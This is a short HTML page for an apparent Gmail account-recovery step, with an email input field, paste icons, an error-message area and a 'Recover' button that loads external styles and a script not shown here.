<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>enter Gmail</title>
  <link rel="stylesheet" href="/recovery/enterEmail/style.css">
 
</head>
<body>
  <nav class="navbar">
    <img src="/recovery/enterEmail/pics/fi_tri9i.jpg" alt="image" class="logo"> 
  </nav>
  
  <main class="container">
    <div class="box">
      <img src="/recovery/enterEmail/pics/what.svg" class="what" id="pasteButton" alt="Paste">
     <form class="for">
        
      <fieldset>
     
          <input type="email"  class="input" value="" id="passwordInput" required>
      
          <img src="/recovery/enterEmail/pics/paste.svg" class="paste" id="pasteButton" alt="Paste">
        
       
        <div id="errorMessage" class="error-message"></div>
      
      </fieldset>

      
      <button type="submit" id="enter-gmail" class="button">Recover</button>
 
        
     </form>
     <img src="/recovery/enterEmail/pics/plant.svg" class="plant" id="pasteButton" alt="Paste">
 
    </div>
  </main>

  <script src="/recovery/enterEmail/script.js"></script>

</body>
</html>
